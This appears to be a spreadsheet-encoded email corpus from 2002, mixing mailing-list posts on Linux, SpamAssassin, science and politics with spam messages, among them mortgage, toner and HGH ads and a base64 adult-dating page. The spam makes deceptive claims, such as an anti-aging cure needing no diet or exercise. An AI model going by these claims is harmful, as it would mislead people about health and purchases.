    <t xml:space="preserve">Subject: [ILUG] Fwd: OpenSSH trojan?
</t>
  </si>
  <si>
    <t xml:space="preserve">Saw this on the secure shell mailing list...
 Conor
 ----- Forwarded message from quentyn@fotango.com -----
 Date: Thu, 01 Aug 2002 12:26:53 +0100
 From: quentyn@fotango.com
 To: "secureshell@securityfocus.com" &lt;secureshell@securityfocus.com&gt;
 Subject: OpenSSH trojan?
 Posts doing the rounds ( probably loads of these posts sitting awaiting
 moderation)
 looks like there is a trojan in the latest OpenSSH
 http://www.mavetju.org/weblog/weblog.php
 http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
 ----- End forwarded message -----
 -- 
 Conor Daly 
 Met Eireann, Glasnevin Hill, Dublin 9, Ireland
 Ph +353 1 8064276 Fax +353 1 8064247
 ------------------------------------
 bofh.irmet.ie running RedHat Linux  9:54am  up 22:32,  9 users,  load average: 0.67, 0.36, 0.29
 **********************************************************************
 This email and any files transmitted with it are confidential and
 intended solely for the use of the individual or entity to whom they
 are addressed. If you have received this email in error please notify
 the system manager.
 This footnote also confirms that this email message has been swept 
 for the presence of computer viruses.
 **********************************************************************
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 1075] RPM build puts wrong path in the *.cf files
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1075
 spamassassin-contrib@msquadrat.de changed:
            What    |Removed                     |Added
 ----------------------------------------------------------------------------
                  CC|                            |spamassassin-
                    |                            |devel@lists.sourceforge.net
          AssignedTo|spamassassin-               |spamassassin-
                    |devel@lists.sourceforge.net |contrib@msquadrat.de
 ------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-08 04:16 -------
 I'm gonna fix this one. I think the best solution will be to copy the modified 
 rules to blib and install them from there. Then the rules files will be 
 changed on build time and not install time, too. 
 ------- You are receiving this mail because: -------
 You are the assignee for the bug, or are watching the assignee.
 You are on the CC list for the bug, or are watching someone who is.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</si>
  <si>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CNET | CatchUp Dispatch
 CNET: A note to our subscribers
 July 17, 2002
 Vol. 3, No. 17
 Dear CatchUp newsletter subscribers:
 Starting this week, we will be taking a break from our
 regularly scheduled CatchUp newsletter--our apologies for any
 inconvenience this may cause. However, have no fear, the
 CatchUp database is still being updated, so run CatchUp now and
 see what updates are waiting for you. As always, a hearty
 thank-you for your continued support.
 Cheers!
 The CatchUp Team
 _________________________________________________________________
 The e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com
 To sign up for more CNET newsletters, click here:
 http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet
 To unsubscribe, click here:
 http://clickthru.online.com/Click?q=89-h2JbrpJiraHZk5rhpCqNpVwaE_Yl9sRR
 For the CNET Newsletters FAQ, click here:
 http://clickthru.online.com/Click?q=9f-o7XMQ1JdPBetrVIYlcGhVIlcU_eR 
 To learn about advertising opportunities in CNET Newsletters, click
 here:
 http://clickthru.online.com/Click?q=b4-aJlbQ6Z1ubiOo-gqJzDxDXozLCyR 
 Copyright 2002 CNET Networks, Inc. All rights reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Free Mortgage Rate Quote mbvod
</t>
  </si>
  <si>
    <t xml:space="preserve">Did you hear? Interest rates have just been lowered again. Don't delay! Get your free mortgage rate quote now and see how much you could save every month!
 Free, no obligation quote:
 http://www.toplinequotes.com/freequote/
 ---------------------------------------
 To be removed, go to: 
 http://www.toplinequotes.com/unsubscribe/
 Allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: MIT OpenCourseWare
</t>
  </si>
  <si>
    <t xml:space="preserve">At 05:38 PM 9/30/2002 +0200, Eugen Leitl wrote:
 &gt;Looks useful. Hopefully, they'll put up some more material soon.
 &gt;
 &gt;         http://ocw.mit.edu/global/all-courses.html
 I'll be sure to keep everyone posted on the next update. :)
 --
 B.K. DeLong
 bkdelong@ceci.mit.edu
 OpenCourseWare
 +1.617.258.0360
 +1.617.877.3271 (cell)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [zzzzteana] Moon over ocean
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;David asked:
 &gt;&gt; My wife noticed something odd.  The nearly-full moon was about 30
 &gt;&gt; degrees above the horizon.  There was a notable glow on the horizon,
 &gt;&gt; except under the moon.  The moon seemed to be in a column of darkness
 &gt;&gt; that was about three times the apparent width of the moon.  We could see
 &gt;&gt; the column over its entire length as a strip of sky darker than the sky
 &gt;&gt; around it.
 &gt;&gt;
 &gt;&gt; Any of you ever see this?  Do you have any idea what could have caused
 &gt;&gt; it?  I suspect it's due to some pecularity of the visual system, but
 &gt;&gt; have no clear idea.
 Bill Jacobs:
 &gt; I'm surprised to not find this phenomenon in Corlis. I could have sworn I
 &gt; saw it there. He does have the somewhat similar dark sky between a rainbow
 &gt; and a secondary bow. I personally have seen a rainbow enclosing a
 &gt; semi-circle of darker sky.
 &gt;
 &gt; I know I've read about pillars under the Sun and Moon elsewhere,
 &gt; but I can't recall if they were reportedly dark or bright. I do know
 &gt; these sorts of things are supposed to be quirks of optics not of the
 &gt; visual system. I'm sorry I haven't got any answers, but a search
 &gt; through some books on atmospheric optics ought to turn a few hints up.
 Some links:
 comprehensive
 http://www.meteoros.de/indexe.htm
 Atmospheric Light Phenomena
 http://www.auf.asn.au/meteorology/section12.html
 interesting observational stuff from the prior millenium including pix
 (click 1997 / colour plates)
 http://www.ursa.fi/ursa/jaostot/halot/ehp/index.html
 more pix, many of which flip to negative to highlight details (hover cursor)
 http://idefix.taide.turkuamk.fi/~iluukkon/taivas/valok/88.html and
 subsequent links
 john k
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; I would be in favor of creating new SpamAssassin CVS modules and
 &gt; Bugzilla categories for other clients (provided there is sufficient
 &gt; interest and a maintainer).
 yeah, I'd be with that -- as long as they have a maintainer ;)
 however regarding CVS, I'd say many projects might find it easier
 to just sign up as a new proj with sf.net -- it might save them having
 to go through us (not sure, depends on what sf.net's procedures
 are like).
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....          BSJMCOIK
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HR&gt;
 &lt;html&gt;
 &lt;div bgcolor=3D"#FFFFCC"&gt;
   &lt;p align=3D"center"&gt;&lt;a
 href=3D"http://www.webbasedmailing.com"&gt;&lt;img border=3D"0"
 src=3D"http://www.webbasedmailing.com/Toners2goLogo.jpg"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href=3D"http://www.webbasedmailing.com"&gt;Toners 2 Go
 &lt;/a&gt;is your secret
 weapon to lowering your cost for &lt;a
 href=3D"http://www.webbasedmailing.com"&gt;High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href=3D"http://www.webbasedmailing.com"&gt;Toners
 2 Go&lt;/a&gt;!
 &lt;/p&gt;
 &lt;hr&gt;
   request to be excluded by visiting &lt;a
 href=3D"http://www.interactive-mailing.com/datacenter.htm"&gt;HERE&lt;/a&gt;&lt;/span&gt;=
 &lt;/font&gt;&lt;br&gt;
 &lt;/div&gt;
 &lt;/html&gt;
 michaell
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Property Rights
</t>
  </si>
  <si>
    <t xml:space="preserve">Some of the reasons they don't own it is because it is government land
 that you can't convert without an army of lawyers.
 In other cases, you originally had owners who didn't have the 'right' to
 subdivide, but they subdivide anyway.
 It is interesting to note that for several centuries in Japan it was a
 death sentence to sell land.  They sold it anyway, and kept records.
 In the US, we eventually got quite friendly with squatters and adverse
 possession, and integrated out extra-legal arrangements and 'spontaneous
 social contracts' into the official law.
 Mr. Long, I think you'd particularly enjoy the De Soto work.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Dave
 &gt; Long
 &gt; Sent: Tuesday, August 20, 2002 2:17 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: RE: The Curse of India's Socialism
 &gt; 
 &gt; 
 &gt; &gt;                                                                   In
 the
 &gt; &gt; Philippines, getting legal title can take 20 years.  In Egypt, about
 80%
 &gt; &gt; of the population in Cairo lives in places where they are officially
 &gt; &gt; illegal.
 &gt; 
 &gt; If the situation in Egypt is anything
 &gt; like the situation in the Philippines,
 &gt; it's because people (due to a strange
 &gt; desire for jobs) squat on land which
 &gt; they don't own.*
 &gt; 
 &gt; For people to be able to buy their own
 &gt; land, capitalism must be healthy, but
 &gt; not triumphant; there need to be too
 &gt; many capitalists, not too few.
 &gt; 
 &gt; (how well off were the major landowners
 &gt; in india before independence?)
 &gt; 
 &gt; -Dave
 &gt; 
 &gt; * In the US, we are not so friendly to
 &gt; our capitalists: adverse possession is
 &gt; only supposed to take 5 years.
 &gt; 
 &gt; (How much do we owe to our frontiers?
 &gt; Heck, in Egypt didn't they pretty much
 &gt; invent geometry a few millenia ago to
 &gt; keep track of their property lines?)
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-10-07 at 13:28, Matthias Saou wrote:
 &gt; I've never heard of any CD-ROM or DVD-ROM drive having problems with DMA...
 &gt; although there probably is since Red Hat decided to default disabling it a
 &gt; few releases back :-/
 Heh. I get to see bad CDROM problems all the time. Mostly when vendors
 buy crap cables to try to save $0.02/each, but there are chipsets and
 drives with known DMA issues as well.
 &gt; Normally, even if you try to enable DMA and your device doesn't support it,
 &gt; it simply don't be able to make the change, and that's it. The problem IIRC
 &gt; is with crappy hardware that is supposed to support DMA but doesn't work as
 &gt; expected when it's enabled... maybe Chris could confirm this? ;-)
 Usually if you enable DMA on a CDROM that can't handle it gracefully you
 won't be able to read data off it relably, and that's about it. No
 end_of_the_world problems, and easily fixed.
 &gt; I guess I'll settle for the /dev/dvd link change as described and putting
 &gt; the DMA tip in the %description :-)
 My biggest beef with automatically setting /dev/dvd is that I always
 seem to have a CD-Burner and a DVD drive (or DVD burner) in the same
 box, and I usually have the DVD as the second drive /dev/cdrom1 in
 "kudzu-speak". I agree that the %description is the best place for the
 tip. Unless someone can come up with a way to probe CD/DVD drives to
 divulge their largest supported media size without loading ide-scsi or
 having that media currently in the drive.
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Shape up for summer now
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health 
 discovery that actually reverses aging while burning fat, 
 without dieting or exercise! This proven discovery has even 
 been reported on by the New England Journal of Medicine. 
 Forget  aging and dieting forever! And it's Guaranteed!   
 Click here:
 http://web.kuhleersparnis.ch/hgh/index.html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
 You are receiving this email as a subscriber
 to the Opt-In America Mailing List. 
 To unsubscribe from future offers,
 just click here:
 mailto:affiliateoptout@btamail.net.cn?Subject=off
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Man tries to bungee from bridge to passing cruise ship, bashes
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8421992,1717/
 Date: 2002-10-01T07:33:14+01:00
 (abc.net.au)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Jim Whitehead &lt;ejw@cse.ucsc.edu&gt; writes:
     J&gt; For anyone to fully bury global warming, they would need to
     J&gt; explain why the dramatic increase in CO2 concentrations are not
     J&gt; increasing the global temperature. They would also need to
     J&gt; explain why, worldwide, glaciers are melting faster than they
     J&gt; have previously in the historical record. 
 The associated links cover that: The surface temperature in spots
 frequented by people is warmer (hence all our groundbased sensors
 reporting global warming) although the overall environmental
 temperature is decreasing.
 Apparently, the real news is not that there is no global warming, but
 that our models of the warming were seriously flawed by naive
 convection models.  This too was not news to the theoreticians: All
 that has happened is that NASA has confirmed the naiive convection
 concerns.
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] doolin
</t>
  </si>
  <si>
    <t xml:space="preserve">Might just take a trip over there later tomorrow, it is after all only
 on my backdoor-step...
 E.
 -----Original Message-----
 From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie] On Behalf Of
 Ronan Waide
 Sent: 27 August 2002 21:19
 To: ILUG list
 Subject: [ILUG] doolin
 If you're not in Doolin, beg, borrow, or steal your way there before the
 LBW folk depart. It's far too much fun.
 Cheers,
 Waider. Just back.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me.
 "...we are in fact well and truly doomed. She says that if I leave now, 
  I can probably get a good head start before they realize that I'm
 gone."
                                                     - Jamie Zawinski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</si>
  <si>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Sidekick, your mobile blogging pal
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516136
 Date: Not supplied
 [IMG: http://www.craphound.com/images/hiptopblog.jpg] The T-Mobile Sidekick and 
 other instances of the Danger Hiptop PDA/Phone are being promoted as mobile 
 blogging tools. Link[1] Discuss[2] (_via Hack the Planet[3]_) 
 [1] http://www.hiptop.com/
 [2] http://www.quicktopic.com/boing/H/GHXGWhmS5e2
 [3] http://wmf.editthispage.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Eugen Leitl:
 &gt;Clearly our non-silly non-antiquated ideas about relationships have 
 &gt;resulted in mostly short-duration relationships and single-parented, 
 &gt;dysfunctional kids ..
 Don't swallow too quickly what you have read about
 more traditional cultures, today or in the past. Do
 we have any statistics on the poor man's divorce from
 centuries past? Are you so sure that the kids in 18th
 century England were any more "functional" than those
 today? What about 20th century Saudi Arabia?
 &gt;At least from the viewpoint of demographics sustainability and 
 &gt;counterpressure to gerontocracy and resulting innovatiophobia we're doing
 &gt;something wrong.
 Granting your first two points, I'm skeptical about
 the last. Do you see ANY signs that America specifically
 or the west generally are suffering from lack of
 innovation, vis-a-vis youth nations such as Iran? The
 last I read, the third generation of the revolution all
 (a) want to move to America, and (b) failing that, are
 importing everything they can American.
 _________________________________________________________________
 Join the worlds largest e-mail service with MSN Hotmail. 
 http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Education debate
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8430044,215/
 Date: 2002-10-01T12:41:57+01:00
 *Live online:* The Observer's *Tracy McVeigh* and experts *Tim Brighouse* and *
 Ann Hodgson* will be here on Thursday at 3pm to discuss the government's 
 record. Post your questions now.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reading to Children has proven to increase their vocabulary OBUM
</t>
  </si>
  <si>
    <t xml:space="preserve">*This message was transferred with a trial version of CommuniGate(tm) Pro*
 &lt;HTML&gt;&lt;FONT  BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 =
 PTSIZE=3D10&gt;&lt;B width=3D"163" height=3D"255"&gt;&lt;/b&gt;&lt;/FONT&gt;&lt;B width=3D"163" he=
 ight=3D"255"&gt;&lt;FONT  COLOR=3D"#008000" BACK=3D"#ffffff" style=3D"BACKGROUND=
 -COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" =
 LANG=3D"0"&gt;&lt;B&gt;Missed all the news this weekend? &lt;/FONT&gt;&lt;FONT  COLOR=3D"#00=
 8080" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=
 =3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt; &lt;/FONT&gt;&lt;FONT  CO=
 LOR=3D"#008080" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;IMG src=3D"http://www.lordoftheringsaudio.com/images/mixed/complete.jpg" =
 &lt;BR width=3D"213" height=3D"335"&gt;
 &lt;BR&gt;
 &lt;B width=3D"163" height=3D"255"&gt;&lt;/b&gt;&lt;/FONT&gt;
 &lt;B width=3D"163" height=3D"255"&gt;&lt;FONT  COLOR=3D"#008000" BACK=3D"#ffffff" =
 style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSER=
 IF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;B&gt;Were you too busy treating the special mo=
 ms in your life like the goddesses they are? &lt;BR&gt;
 &lt;BR&gt;
 Well good for you! &lt;/B&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#008000" BACK=3D"#ffff00" s=
 tyle=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERI=
 F" FACE=3D"Arial" LANG=3D"0"&gt;&lt;B&gt;Now follow the link to see what you may ha=
 ve missed this weekend!&lt;/FONT&gt;&lt;FONT  COLOR=3D"#008080" BACK=3D"#80ff80" st=
 yle=3D"BACKGROUND-COLOR: #80ff80" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF=
 " FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#800000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;A HREF=3D"http://www.lordoftheringsaudio.com/cgi-bin/enter.cgi?marketing_=
 id=3Dlord001"&gt;Click here to view this important announcement&lt;/A&gt; &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#008000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;B&gt;has opened their doors for this awesome offer.&lt;BR&gt;
 &lt;BR&gt;
 Just check it out. We send it to you and you may review it for 30days.&lt;BR&gt;
 &lt;BR&gt;
 No payment upfront and No OBLIGATIONS&lt;BR&gt;
 &lt;BR&gt;
 If you don't like it, just send it back and you wont be charged&lt;/B&gt;&lt;/FONT&gt;=
 &lt;B&gt;&lt;FONT  COLOR=3D"#008080" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #f=
 fffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"=
 &gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#008000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;THIS NEWSLETTER IS NOT UNSOLICITED!&lt;BR&gt;
 The email address has been subscribed and confirmed to our mailing list wh=
 ich means that someone with access to this email account verified the subs=
 cription per email.&lt;BR&gt;
 If you would like to stop receiving this newsletter:&lt;BR&gt;
 &lt;a href=3D"http://www.removal-services-online.com/"&gt;
 CLICK HERE&lt;/a&gt; TO&lt;/FONT&gt;&lt;/B&gt;&lt;/b&gt;&lt;FONT  COLOR=3D"#008000" BACK=3D"#ffffff" =
 style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSER=
 IF" FACE=3D"Arial" LANG=3D"0"&gt;&amp;nbsp;
 U N S U B S C R I B E&lt;/FONT&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;TO48 5-13 C14 P
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;center&gt;Be transported to the World of Middle Earth&lt;/center&gt;
 &lt;BR&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Americans are becoming more spiritual
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8304314,1717/
 Date: 2002-09-27T08:51:28+01:00
 (orlando sentinel)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Archaeological finds show that the Incas rode dinosaurs, science
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8279315,1717/
 Date: 2002-09-26T15:30:15+01:00
 (creationists.org)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Horny Wives
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00E5_50D62D7A.E1807C03
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PEhUTUw+DQo8SEVBRD4NCiAgIA0KICAgPFRJVExFPk1hcnJpZWQgQnV0IExv
 bmVseTwvVElUTEU+DQo8L0hFQUQ+DQo8Qk9EWSBCR0NPTE9SPSIjRkZGRkZG
 IiBMSU5LPSIjRkYwMDAwIiBWTElOSz0iI0ZGMDAwMCIgQUxJTks9IiNGRjAw
 MDAiPg0KDQo8UCBBTElHTj0iY2VudGVyIj4gPElNRyBCT1JERVI9IjAiIFNS
 Qz0iaHR0cDovL3d3dy5wYWdlNGxpZmUub3JnL3VzZXJzL3h4eGRhdGluZy9t
 YXJyaWVkYW5kbG9uZWx5L2ltYWdlcy9sb2dvLmpwZyIgV0lEVEg9IjUwMCIg
 SEVJR0hUPSIxOTEiPiZuYnNwOyAmbmJzcDsgPC9QPg0KPENFTlRFUj4NCiAg
 PFRBQkxFIENFTExTUEFDSU5HPTUgQ0VMTFBBRERJTkc9NSBCR0NPTE9SPSIj
 NjY2Njk5IiA+DQogICAgPFRSPg0KPFREPjxJTUcgU1JDPSJodHRwOi8vd3d3
 LnBhZ2U0bGlmZS5vcmcvdXNlcnMveHh4ZGF0aW5nL21hcnJpZWRhbmRsb25l
 bHkvcDcwNi5qcGciIEJPUkRFUj0wIEhFSUdIVD0xODAgV0lEVEg9MTIwPjwv
 VEQ+DQoNCjxURD48SU1HIFNSQz0iaHR0cDovL3d3dy5wYWdlNGxpZmUub3Jn
 L3VzZXJzL3h4eGRhdGluZy9tYXJyaWVkYW5kbG9uZWx5L3A3MDQuanBnIiBC
 T1JERVI9MCBIRUlHSFQ9MTgwIFdJRFRIPTEyMD48L1REPg0KDQo8VEQ+PElN
 RyBTUkM9Imh0dHA6Ly93d3cucGFnZTRsaWZlLm9yZy91c2Vycy94eHhkYXRp
 bmcvbWFycmllZGFuZGxvbmVseS9wNzA1LmpwZyIgQk9SREVSPTAgSEVJR0hU
 PTE4MCBXSURUSD0xMjA+PC9URD4NCg0KPFREPjxJTUcgU1JDPSJodHRwOi8v
 d3d3LnBhZ2U0bGlmZS5vcmcvdXNlcnMveHh4ZGF0aW5nL21hcnJpZWRhbmRs
 b25lbHkvcDExOTliLmdpZiIgQk9SREVSPTAgSEVJR0hUPTE4MCBXSURUSD0x
 MjA+PC9URD4NCjwvVFI+DQo8L1RBQkxFPjwvQ0VOVEVSPg0KDQo8QlI+Jm5i
 c3A7DQo8Q0VOVEVSPjxUQUJMRSBDT0xTPTEgV0lEVEg9IjUwMCIgSEVJR0hU
 PSI2MDAiID4NCjxUUj4NCjxURD48Rk9OVCBDT0xPUj0iI0ZGNjY2NiI+PEEg
 SFJFRj0iaHR0cDovL3d3dy5wYWdlNGxpZmUub3JnL3VzZXJzL3h4eGRhdGlu
 Zy9tYXJyaWVkYW5kbG9uZWx5L3ByZXZpZXcuaHRtIj5FTlRFUg0KVEhFIFdP
 UkxEIEZBTU9VUzwvQT4gPC9GT05UPjxGT05UIFNJWkU9IjYiIENPTE9SPSIj
 RkYwMEZGIj5NYXJyaWVkIEJ1dCBMb25lbHk8L0ZPTlQ+PEI+PEk+PEZPTlQg
 Q09MT1I9IiNGRjAwRkYiIFNJWkU9IjUiPiE8L0ZPTlQ+PC9JPjwvQj48Rk9O
 VCBDT0xPUj0iI0ZGMDBGRiI+DQo8L0ZPTlQ+DQo8VUw+DQo8TEk+DQpBIHdv
 cmxkd2lkZSBub24tcHJvZml0IG9yZ2FuaXphdGlvbiBmb3VuZGVkIGFuZCBt
 YW5hZ2VkIGV4Y2x1c2l2ZWx5IGJ5DQp3b21lbjwvTEk+DQoNCjxMST4NCkZl
 YXR1cmluZyBvbmx5IFJFQUwgYXR0YWNoZWQgd29tZW4gaW4gc2VhcmNoIG9m
 IFJFQUwgU2V4IE9uIFRoZSBTaWRlIG5hdGlvbndpZGUNCmFuZCBpbiAyMCBj
 b3VudHJpZXM8L0xJPg0KDQo8TEk+DQpCYXNlZCBpbiBMb3MgQW5nZWxlcywg
 Q2FsaWZvcm5pYTogVGhlIFdvcmxkIENhcGl0YWwgZm9yIFNleCBPbiBUaGUg
 U2lkZSZuYnNwOzwvTEk+DQo8L1VMPg0KPEZPTlQgQ09MT1I9IiNGRjAwMDAi
 PkZBQ1Q6PC9GT05UPg0KPFVMPg0KPExJPg0KT3ZlciAyNyBNaWxsaW9uIHZp
 c2l0b3JzIGluIGxlc3MgdGhhbiAyIHllYXJzIHdpdGhvdXQgYW55IGNvbW1l
 cmNpYWwgYWR2ZXJ0aXNpbmcNCm1lYW5zLiAiVGhlIHdvcmQgc3ByZWFkcyBm
 YXN0Ii48L0xJPg0KPC9VTD4NCiZuYnNwOzxGT05UIENPTE9SPSIjRkYwMDAw
 Ij5MRUdBTCBOT1RJQ0U8L0ZPTlQ+DQo8VUw+DQo8TEk+DQpUaGlzIHNpdGUg
 Y29udGFpbnMgYWR1bHQgb3JpZW50ZWQgbWF0ZXJpYWwuIElmIHlvdSBmaW5k
 IHRoaXMgbWF0ZXJpYWwgdG8NCmJlIG9mZmVuc2l2ZSBvciBhcmUgdW5kZXIg
 dGhlIGFnZSBvZiAxOCB5ZWFycyAob3IgMjEgeWVhcnMgZGVwZW5kaW5nIG9u
 DQpsb2NhbCBsYXdzKSwgb3IgaXQgaXMgaWxsZWdhbCB3aGVyZSB5b3UgYXJl
 LCB0aGVuIHlvdSBtdXN0IExFQVZFIHRoaXMgc2l0ZQ0KTk9XISZuYnNwOzwv
 TEk+DQoNCjxMST4NCkJ5IGVudGVyaW5nIHRoaXMgc2l0ZSB5b3UgZGVjbGFy
 ZSB1bmRlciBwZW5hbHR5IG9mIHBlcmp1cnkgdGhhdCB5b3UgYXJlDQphYm92
 ZSB0aGUgYWdlIGxpbWl0IGFuZCBkbyBub3QgZmluZCB0aGlzIG1hdGVyaWFs
 IG9mZmVuc2l2ZS4gWW91IHdpbGwgYWxzbw0Kbm90IGhvbGQgdXMgbGlhYmxl
 IGZvciBhbnkgZGFtYWdlcyBvciBwZXJzb25hbCBkaXNjb21mb3J0LiZuYnNw
 OzwvTEk+DQoNCjxMST4NCkkgYW0gYW4gYWR1bHQgb3ZlciB0aGUgYWdlIG9m
 IDE4IHllYXJzIChvciAyMSB5ZWFycyBkZXBlbmRpbmcgb24gbG9jYWwNCmdv
 dmVybmluZyBsYXdzIHJlbGF0aW5nIHRvIGV4cGxpY2l0IHNleHVhbCBtYXRl
 cmlhbCkuPC9MST4NCg0KPExJPg0KSSB3aWxsIG5vdCBhbGxvdyBhbnlvbmUg
 dW5kZXIgdGhlIGxlZ2FsIGFnZSB3aGljaCBpcyBkZXRlcm1pbmVkIGFzIGFi
 b3ZlDQp0byBoYXZlIGFjY2VzcyB0byBhbnkgb2YgdGhlIG1hdGVyaWFscyBj
 b250YWluZWQgd2l0aGluIHRoaXMgc2l0ZS48L0xJPg0KDQo8TEk+DQpJIGFt
 IHZvbHVudGFyaWx5IGNvbnRpbnVpbmcgb24gd2l0aCB0aGlzIHNpdGUsIEkg
 dW5kZXJzdGFuZCBJIHdpbGwgYmUgZXhwb3NlZA0KdG8gc2V4dWFsbHkgZXhw
 bGljaXQgbWF0ZXJpYWwgaW5jbHVkaW5nIHBpY3R1cmVzLCBzdG9yaWVzICwg
 dmlkZW9zIGFuZA0KZ3JhcGhpY3MuPC9MST4NCg0KPExJPg0KSSB3aWxsIG5v
 dCBob2xkIHlvdSByZXNwb25zaWJsZSBmb3IgYW55IGRhbWFnZXMgb3Igdmlv
 bGF0aW9ucyB0aGF0IHlvdQ0KbWF5IGhhdmUgY2F1c2VkLjwvTEk+DQo8L1VM
 Pg0KDQo8Q0VOVEVSPg0KPFA+PEJSPjxCPjxGT05UIFNJWkU9Nz48QSBIUkVG
 PSJodHRwOi8vd3d3LnBhZ2U0bGlmZS5vcmcvdXNlcnMveHh4ZGF0aW5nL21h
 cnJpZWRhbmRsb25lbHkvcHJldmlldy5odG0iPkVOVEVSDQpTSVRFPC9BPjwv
